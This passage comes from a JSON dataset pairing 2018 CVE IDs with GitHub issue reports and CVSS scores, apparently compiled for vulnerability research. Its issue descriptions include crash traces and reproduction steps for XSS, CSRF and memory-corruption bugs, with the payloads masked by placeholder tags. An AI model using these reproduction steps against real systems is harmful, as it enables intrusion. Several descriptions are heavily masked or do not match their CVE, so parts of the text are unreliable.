  21801. "exploitabilityScore": 2.8
  21802. },
  21803. {
  21804. "CVE_ID": "CVE-2018-13250",
  21805. "Issue_Url_old": "https://github.com/libming/libming/issues/147",
  21806. "Issue_Url_new": "https://github.com/libming/libming/issues/147",
  21807. "Repo_new": "libming/libming",
  21808. "Issue_Created_At": "2018-07-04T12:38:26Z",
  21809. "description": "SEGV on decompile.c. ERRORTAG swftotcl $poc URLTAG",
  21810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21811. "severity": "MEDIUM",
  21812. "baseScore": 6.5,
  21813. "impactScore": 3.6,
  21814. "exploitabilityScore": 2.8
  21815. },
  21816. {
  21817. "CVE_ID": "CVE-2018-13251",
  21818. "Issue_Url_old": "https://github.com/libming/libming/issues/149",
  21819. "Issue_Url_new": "https://github.com/libming/libming/issues/149",
  21820. "Repo_new": "libming/libming",
  21821. "Issue_Created_At": "2018-07-04T13:18:41Z",
  21822. "description": "An integer overflow . ERRORTAG swftotcl $poc URLTAG",
  21823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21824. "severity": "MEDIUM",
  21825. "baseScore": 6.5,
  21826. "impactScore": 3.6,
  21827. "exploitabilityScore": 2.8
  21828. },
  21829. {
  21830. "CVE_ID": "CVE-2018-13339",
  21831. "Issue_Url_old": "https://github.com/TylerGarlick/angular-redactor/issues/77",
  21832. "Issue_Url_new": "https://github.com/tylergarlick/angular-redactor/issues/77",
  21833. "Repo_new": "tylergarlick/angular-redactor",
  21834. "Issue_Created_At": "2018-07-05T09:34:36Z",
  21835. "description": "XSS Vulnerability Discovered. Description: The stored XSS can be triggered once you editing content by using Redactor NUMBERTAG in HTML Mode. POC NUMBERTAG I pen tested the official showcase website of Redactor NUMBERTAG URLTAG it has a demo editor in its front page. Then, click the icon to use HTML content mode: FILETAG NUMBERTAG inject XSS payload APITAG APITAG NUMBERTAG SS discovered! APITAG APITAG",
  21836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21837. "severity": "MEDIUM",
  21838. "baseScore": 6.1,
  21839. "impactScore": 2.7,
  21840. "exploitabilityScore": 2.8
  21841. },
  21842. {
  21843. "CVE_ID": "CVE-2018-13339",
  21844. "Issue_Url_old": "https://github.com/gleez/cms/issues/796",
  21845. "Issue_Url_new": "https://github.com/gleez/cms/issues/796",
  21846. "Repo_new": "gleez/cms",
  21847. "Issue_Created_At": "2018-07-05T09:10:11Z",
  21848. "description": "XSS Vulnerability caused by Redactor NUMBERTAG The stored XSS can be triggered once you editing content by using Redactor NUMBERTAG URLTAG plugin. it can be found in both PAGE and BLOG modules. FILETAG To developer: Please avoid use Redactor right now before they fix this issue. Reference: URLTAG URLTAG",
  21849. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21850. "severity": "MEDIUM",
  21851. "baseScore": 6.1,
  21852. "impactScore": 2.7,
  21853. "exploitabilityScore": 2.8
  21854. },
  21855. {
  21856. "CVE_ID": "CVE-2018-13340",
  21857. "Issue_Url_old": "https://github.com/gleez/cms/issues/795",
  21858. "Issue_Url_new": "https://github.com/gleez/cms/issues/795",
  21859. "Repo_new": "gleez/cms",
  21860. "Issue_Created_At": "2018-07-05T08:47:04Z",
  21861. "description": "CSRF Vulnerability Discovered. Description: CSRF APITAG site request forgery) Vulnerability discovered in Gleez CMS NUMBERTAG when I penetrate testing a couple of vulnerabilities in Demo website: FILETAG POC NUMBERTAG Log in as a user or admin NUMBERTAG Add new page or blog FILETAG NUMBERTAG Intercept POST request when a normal user or admin submitting a new page or blog, FILETAG NUMBERTAG Launch a CSRF attack FILETAG Exec code: FILETAG NUMBERTAG Proof of Attack Successed! FILETAG FILETAG",
  21862. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21863. "severity": "HIGH",
  21864. "baseScore": 8.8,
  21865. "impactScore": 5.9,
  21866. "exploitabilityScore": 2.8
  21867. },
  21868. {
  21869. "CVE_ID": "CVE-2018-13421",
  21870. "Issue_Url_old": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
  21871. "Issue_Url_new": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
  21872. "Repo_new": "ben-strasser/fast-cpp-csv-parser",
  21873. "Issue_Created_At": "2018-07-06T08:28:54Z",
  21874. "description": "Heap buffer overflow in APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ffff NUMBERTAG ff7ff at pc NUMBERTAG fd4 bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff NUMBERTAG ff7ff thread T NUMBERTAG fd3 in io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) PATHTAG NUMBERTAG fd3 in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG io::no_quote_escape APITAG >(char , std::vector<int, std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const , unsigned int) PATHTAG NUMBERTAG in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG const , char const , char const >(unsigned int, char const , char const , char const ) PATHTAG NUMBERTAG f7 in main PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ffff NUMBERTAG ff7ff is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG ea NUMBERTAG in APITAG APITAG >) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG const ) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG &>(char &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) Shadow bytes around the buggy address NUMBERTAG e0d7ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The test driver and the input case is displayed at : FILETAG URLTAG",
  21875. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21876. "severity": "CRITICAL",
  21877. "baseScore": 9.8,
  21878. "impactScore": 5.9,
  21879. "exploitabilityScore": 3.9
  21880. },
  21881. {
  21882. "CVE_ID": "CVE-2018-13433",
  21883. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/2184",
  21884. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/2184",
  21885. "Repo_new": "boostio/boostnote-legacy",
  21886. "Issue_Created_At": "2018-07-05T15:30:40Z",
  21887. "description": "Another trigger position of XSS. I'm using the latest version ( PATHTAG NUMBERTAG new notes, select Markdown, write payload: APITAG It's not going to trigger now NUMBERTAG when I need to highlight the markdown code, I write it before the code. \" ` \" I trigger xss. when I enter third. FILETAG FILETAG Bootsnote is great!",
  21888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21889. "severity": "MEDIUM",
  21890. "baseScore": 6.1,
  21891. "impactScore": 2.7,
  21892. "exploitabilityScore": 2.8
  21893. },
  21894. {
  21895. "CVE_ID": "CVE-2018-13440",
  21896. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/49",
  21897. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/49",
  21898. "Repo_new": "mpruett/audiofile",
  21899. "Issue_Created_At": "2018-07-06T15:21:53Z",
  21900. "description": "NULL pointer dereference in APITAG in APITAG There exists one NULL pointer dereference bug in APITAG in APITAG which allows an attacker to cause a denial of service via a crafted caf file. FILETAG To reproduce with the attached poc file: ./sfconvert $poc output format aiff APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ff NUMBERTAG b NUMBERTAG f bp NUMBERTAG ffd2fd4dd NUMBERTAG sp NUMBERTAG ffd2fd4d9c0 T NUMBERTAG ff NUMBERTAG b NUMBERTAG e in APITAG , Track ) PATHTAG NUMBERTAG ff NUMBERTAG abd in APITAG PATHTAG NUMBERTAG ec NUMBERTAG in copyaudiodata PATHTAG NUMBERTAG ebbe4 in main PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG , Track NUMBERTAG ABORTING",
  21901. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21902. "severity": "MEDIUM",
  21903. "baseScore": 6.5,
  21904. "impactScore": 3.6,
  21905. "exploitabilityScore": 2.8
  21906. },
  21907. {
  21908. "CVE_ID": "CVE-2018-13443",
  21909. "Issue_Url_old": "https://github.com/EOSIO/eos/issues/6585",
  21910. "Issue_Url_new": "https://github.com/eosio/eos/issues/6585",
  21911. "Repo_new": "eosio/eos",
  21912. "Issue_Created_At": "2019-01-11T09:03:58Z",
  21913. "description": "A heap buffer overflow vunnerability of wasm. This bug is already reported at hackerone and has been solved It's just public here. Summary: A heap overflow in the jit wasm which could lead to code execution. In function APITAG when adding the pointer APITAG there is no boundary check. Description: it seems that the bug happens at the WAST::lex CODETAG when realloc the APITAG ERRORTAG because oldsize >= av >system_mem\uff0cit will trigger the error APITAG invalid old size\" but why it will trigger this error, lets find when the APITAG is malloced. I wrote a gdb script to test it, and found that at ERRORTAG APITAG is not limited, and when tring to APITAG it can assess to the chunk next to it which is APITAG it will overwrite the metadata of APITAG so we will have a heap overflow here...",
  21914. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21915. "severity": "HIGH",
  21916. "baseScore": 8.8,
  21917. "impactScore": 5.9,
  21918. "exploitabilityScore": 2.8
  21919. },
  21920. {
  21921. "CVE_ID": "CVE-2018-13794",
  21922. "Issue_Url_old": "https://github.com/posva/catimg/issues/34",
  21923. "Issue_Url_new": "https://github.com/posva/catimg/issues/34",
  21924. "Repo_new": "posva/catimg",
  21925. "Issue_Created_At": "2018-07-09T07:59:54Z",
  21926. "description": "buffer overflow while cating. I found a heap buffer overflow when cat an image: FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG b5 bp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG b4 in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG fcf in stbi__xload_main PATHTAG NUMBERTAG a NUMBERTAG in stbi_xload PATHTAG NUMBERTAG b0c7 in img_load_from_file PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG daee0 in malloc ( PATHTAG NUMBERTAG in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG ff NUMBERTAG unknown module>) SUMMARY: APITAG heap buffer overflow PATHTAG in stbi__bmp_load_cont Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  21927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21928. "severity": "CRITICAL",
  21929. "baseScore": 9.8,
  21930. "impactScore": 5.9,
  21931. "exploitabilityScore": 3.9
  21932. },
  21933. {
  21934. "CVE_ID": "CVE-2018-13795",
  21935. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/237",
  21936. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/237",
  21937. "Repo_new": "marcobambini/gravity",
  21938. "Issue_Created_At": "2018-07-08T10:09:21Z",
  21939. "description": "unlimit recursive depth. This will cause a endless loop: func f(a) { APITAG return f(a NUMBERTAG func APITAG { return f NUMBERTAG I think there should be a recursive depth limit (such as NUMBERTAG",
  21940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21941. "severity": "HIGH",
  21942. "baseScore": 7.5,
  21943. "impactScore": 3.6,
  21944. "exploitabilityScore": 3.9
  21945. },
  21946. {
  21947. "CVE_ID": "CVE-2018-13818",
  21948. "Issue_Url_old": "https://github.com/twigphp/Twig/issues/2743",
  21949. "Issue_Url_new": "https://github.com/twigphp/twig/issues/2743",
  21950. "Repo_new": "twigphp/twig",
  21951. "Issue_Created_At": "2018-09-05T16:38:49Z",
  21952. "description": "CVETAG . Hello. I couldn't find which change fixed CVETAG . Please help.",
  21953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21954. "severity": "CRITICAL",
  21955. "baseScore": 9.8,
  21956. "impactScore": 5.9,
  21957. "exploitabilityScore": 3.9
  21958. },
  21959. {
  21960. "CVE_ID": "CVE-2018-13833",
  21961. "Issue_Url_old": "https://github.com/dariomanesku/cmft/issues/38",
  21962. "Issue_Url_new": "https://github.com/dariomanesku/cmft/issues/38",
  21963. "Repo_new": "dariomanesku/cmft",
  21964. "Issue_Created_At": "2018-07-09T06:19:41Z",
  21965. "description": "Stack buffer overflow in function APITAG Hi,all. I use Clang NUMBERTAG and APITAG to build cmft , this FILETAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG This is the debug information: CODETAG",
  21966. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21967. "severity": "HIGH",
  21968. "baseScore": 7.8,
  21969. "impactScore": 5.9,
  21970. "exploitabilityScore": 1.8
  21971. },
  21972. {
  21973. "CVE_ID": "CVE-2018-13843",
  21974. "Issue_Url_old": "https://github.com/samtools/htslib/issues/731",
  21975. "Issue_Url_new": "https://github.com/samtools/htslib/issues/731",
  21976. "Repo_new": "samtools/htslib",
  21977. "Issue_Created_At": "2018-07-10T01:38:20Z",
  21978. "description": "A memory leak detected.. Sorry for that I didn't reply in my last issue immediately because I had some other stuffs to handle then. Well ,it seems that you have found the SEGV signal and fixed it. I found another problem here ,it is a memory leak issue. The program I ran is test_bgzf in test directory, the input file is APITAG in the same directory. The command line is ./test_bgzf FILETAG ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG f in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG d in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) '''",
  21979. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21980. "severity": "HIGH",
  21981. "baseScore": 7.5,
  21982. "impactScore": 3.6,
  21983. "exploitabilityScore": 3.9
  21984. },
  21985. {
  21986. "CVE_ID": "CVE-2018-13846",
  21987. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/282",
  21988. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/282",
  21989. "Repo_new": "axiomatic-systems/bento4",
  21990. "Issue_Created_At": "2018-07-09T07:30:42Z",
  21991. "description": "A heap buffer overflow issue found. A heap buffer overflow problem has been found at APITAG ` APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG fffaeec NUMBERTAG sp NUMBERTAG fffaeec NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG fb in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fb NUMBERTAG c2db6b2 in operator APITAG long) ( PATHTAG NUMBERTAG a NUMBERTAG a in APITAG int) PATHTAG NUMBERTAG a NUMBERTAG e8 in APITAG int) PATHTAG NUMBERTAG e in APITAG unsigned int, unsigned int) PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG de2c in APITAG int, APITAG APITAG PATHTAG NUMBERTAG c8a in APITAG APITAG PATHTAG NUMBERTAG ab in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG APITAG APITAG , bool, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9da0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fd fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ''' The testing program is mp NUMBERTAG ts. And the input file has been put at: URLTAG",
  21992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21993. "severity": "CRITICAL",
  21994. "baseScore": 9.8,
  21995. "impactScore": 5.9,
  21996. "exploitabilityScore": 3.9
  21997. },
  21998. {
  21999. "CVE_ID": "CVE-2018-13847",
  22000. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/283",
  22001. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/283",
  22002. "Repo_new": "axiomatic-systems/bento4",
  22003. "Issue_Created_At": "2018-07-09T08:01:09Z",
  22004. "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  22005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22006. "severity": "HIGH",
  22007. "baseScore": 7.5,
  22008. "impactScore": 3.6,
  22009. "exploitabilityScore": 3.9
  22010. },
  22011. {
  22012. "CVE_ID": "CVE-2018-13865",
  22013. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/27",
  22014. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/27",
  22015. "Repo_new": "idreamsoft/iCMS",
  22016. "Issue_Created_At": "2018-07-10T03:57:23Z",
  22017. "description": "ICMS NUMBERTAG SS and bypass iWAF. APITAG This reflective XSS does not need to log APITAG only filters the XSS like APITAG APITAG",
  22018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22019. "severity": "MEDIUM",
  22020. "baseScore": 6.1,
  22021. "impactScore": 2.7,
  22022. "exploitabilityScore": 2.8
  22023. },
  22024. {
  22025. "CVE_ID": "CVE-2018-13879",
  22026. "Issue_Url_old": "https://github.com/RocketChat/Rocket.Chat/issues/10795",
  22027. "Issue_Url_new": "https://github.com/rocketchat/rocket.chat/issues/10795",
  22028. "Repo_new": "rocketchat/rocket.chat",
  22029. "Issue_Created_At": "2018-05-17T11:11:36Z",
  22030. "description": "One persistent and one reflected XSS. Hey guys, I already created a PR for the persistent XSS URLTAG There is another one which is not as critical. When you create an account, the next step will ask for a username. This field will not save HTML control characters but you will receive an error which shows the attempted username unescaped. Nothing critical but it is there.",
  22031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  22032. "severity": "MEDIUM",
  22033. "baseScore": 5.4,
  22034. "impactScore": 2.7,
  22035. "exploitabilityScore": 2.3
  22036. },
  22037. {
  22038. "CVE_ID": "CVE-2018-13996",
  22039. "Issue_Url_old": "https://github.com/codeplea/genann/issues/24",
  22040. "Issue_Url_new": "https://github.com/codeplea/genann/issues/24",
  22041. "Repo_new": "codeplea/genann",
  22042. "Issue_Created_At": "2018-07-12T07:17:05Z",
  22043. "description": "A stack buffer overflow has been found.. A stack buffer overflow has been found in APITAG ERRORTAG The program I ran was example1, but I have made some changes in that file. The example1 I wrote has been placed at : FILETAG The input file has been put here: URLTAG",
  22044. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22045. "severity": "CRITICAL",
  22046. "baseScore": 9.8,
  22047. "impactScore": 5.9,
  22048. "exploitabilityScore": 3.9
  22049. },
  22050. {
  22051. "CVE_ID": "CVE-2018-13998",
  22052. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/491",
  22053. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/491",
  22054. "Repo_new": "clippercms/clippercms",
  22055. "Issue_Created_At": "2018-07-11T07:49:26Z",
  22056. "description": "Another stored XSS in Full name field of APITAG NUMBERTAG Hello I still found some Stored XSS even though many XSS issues were reported in this CMS. They are in Full Name field of user under Security > Manager Users tab and Security > Web Users which allow authenticated attacker (who has user management role) to inject/store malicious script inside Full name field. The script will be executed once Manager Users or Web Users page is accessed. Steps to reproduce stored XSS NUMBERTAG Go to Security > Manager Users or Security > Web Users tab NUMBERTAG Add new user or edit existing user NUMBERTAG In Full name field, input XSS payload and save NUMBERTAG isit Security > Manager Users or Web Uses, the payload will be executed Impact: after successful exploit, user's cookies can be stolen and CSRF validation APITAG header in this CMS) can also be bypassed. That also can lead to admin account take over. Authenticated XSS might not be a serious issue but to let malicious script executed from admin's browser is not a good thing either. Screenshots: FILETAG FILETAG FILETAG",
  22057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  22058. "severity": "MEDIUM",
  22059. "baseScore": 4.8,
  22060. "impactScore": 2.7,
  22061. "exploitabilityScore": 1.7
  22062. },
  22063. {
  22064. "CVE_ID": "CVE-2018-13999",
  22065. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/2",
  22066. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/2",
  22067. "Repo_new": "xwlrbh/catfish",
  22068. "Issue_Created_At": "2018-07-11T09:58:24Z",
  22069. "description": "I found a storage XSS vul in article. administrator in Website background can post article Contains storage XSS vulnerabilities: FILETAG Browse article can trigger XSS APITAG FILETAG",
  22070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  22071. "severity": "MEDIUM",
  22072. "baseScore": 4.8,
  22073. "impactScore": 2.7,
  22074. "exploitabilityScore": 1.7
  22075. },
  22076. {
  22077. "CVE_ID": "CVE-2018-14009",
  22078. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1078",
  22079. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1078",
  22080. "Repo_new": "codiad/codiad",
  22081. "Issue_Created_At": "2018-06-21T07:59:19Z",
  22082. "description": "Active maintained / developed?. No commit since NUMBERTAG months? Is the project active maintained / developed?",
  22083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22084. "severity": "CRITICAL",
  22085. "baseScore": 9.8,
  22086. "impactScore": 5.9,
  22087. "exploitabilityScore": 3.9
  22088. },
  22089. {
  22090. "CVE_ID": "CVE-2018-14014",
  22091. "Issue_Url_old": "https://github.com/caokang/waimai/issues/2",
  22092. "Issue_Url_new": "https://github.com/caokang/waimai/issues/2",
  22093. "Repo_new": "caokang/waimai",
  22094. "Issue_Created_At": "2018-07-12T13:58:40Z",
  22095. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following the page poc\uff1a FILETAG //add a admin CODETAG",
  22096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22097. "severity": "HIGH",
  22098. "baseScore": 8.8,
  22099. "impactScore": 5.9,
  22100. "exploitabilityScore": 2.8
  22101. },
  22102. {
  22103. "CVE_ID": "CVE-2018-14016",
  22104. "Issue_Url_old": "https://github.com/radare/radare2/issues/10464",
  22105. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10464",
  22106. "Repo_new": "radareorg/radare2",
  22107. "Issue_Created_At": "2018-06-24T11:30:52Z",
